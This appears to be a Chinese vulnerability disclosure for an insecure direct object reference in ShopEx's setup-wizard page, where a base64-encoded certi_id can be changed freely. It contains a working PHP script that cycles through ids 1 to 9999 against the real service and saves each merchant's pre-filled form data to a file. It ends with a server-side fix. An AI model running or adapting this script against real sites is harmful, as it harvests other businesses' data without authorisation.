简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在 ShopEx 网店的“使用向导”页面（step2.php）

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码（注意：base64 只是编码，并非加密）后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站，即服务端并未校验请求者是否有权访问该 certi_id
<?php
// Driver: calls ShowshopExD() once for every certi_id from 1 to 9999 (one HTTP
// request each); this is how the report shows that any id can be queried.
for ($i=1; $i < 10000; $i++) { // iterate
    ShowshopExD($i);
}
function ShowshopExD($cid) {
    // Fetches the ShopEx "setup wizard" step for one merchant id and dumps the
    // text-input name/value pairs the page comes back pre-filled with.
    //
    // NOTE(review): what this demonstrates is an insecure direct object
    // reference. `refer` is only base64 (an encoding, not encryption and not a
    // signature), so the `certi_id` inside it is chosen freely by the client,
    // and step2.php appears to fill the form for whatever id it is given
    // without checking that the caller is entitled to that merchant. The fix
    // belongs server-side: bind certi_id to the authenticated session and/or
    // sign the token (e.g. an HMAC) so it cannot be forged -- switching to a
    // different encoding alone would not close the hole.
    //
    // $cid: the certi_id to request; coerced with intval() below.
    // Side effects: one HTTP request, output on stdout, append to c:/shopEx.txt.
    $url='http://guide.ecos.shopex.cn/step2.php';
    // Same JSON shape as the real refer value, with a dummy callback_url.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url.'?refer='.$refer;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
    $result = curl_exec($ch);
    // Re-encodes the page from UTF-8 to GB2312 -- presumably for a GB2312
    // console; confirm.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");
    // A hit is recognised by the page echoing the refer value back.
    if(strpos($result,$refer))
    {
        $fp = fopen("c:/shopEx.txt",'ab'); // save to file
        // Every <input type="text" ... /> tag; capture 1 is the attribute tail.
        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
        foreach ($value[1] as $key) {
            // name="..." ... value="..." -> captures 1 and 3.
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
            echo $res[1][0].':'.$res[3][0]."\r\n";
            $col =$res[1][0].':'.$res[3][0]."\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------'."\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式。但仅更换 refer 的编码或加密方式并不能修复此问题：服务端仍需校验 certi_id 是否属于当前已认证的会话（或对 refer 做签名，如 HMAC，以防伪造），否则仍可被遍历。